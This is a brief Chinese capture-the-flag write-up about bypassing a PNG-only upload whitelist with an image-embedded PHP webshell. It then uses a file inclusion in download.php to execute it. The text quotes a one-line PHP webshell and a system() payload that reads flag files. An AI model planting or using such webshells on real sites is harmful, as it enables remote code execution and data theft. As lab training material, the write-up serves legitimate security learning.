思路
直接在burp里面改target
和host
的值,或者在本地发包
多次尝试后,发现除了正常的png图片,都无法上传,猜测用图片马上传
虽然上传成功,但把后缀改成任意字符串却被拦截,猜测是白名单
.user.ini也无法正常上传,应该有其他的点可以利用.
直接在网站上上传图片马后,发现显示查看图片
点击查看图片后,跳转到/download.php?image=a976285aa6d6096e9edd17db289a73a9.png
,图片也能正常显示,而且也不在upload目录,很明显当前目录存在文件包含
我们传入参数0和1,拼接成<?=system("tac f*");?>,但是页面没有回显,仍然是张图片
<?=$_GET[0]($_POST[1]);?>
下载查看图片,拿到flag
总结
…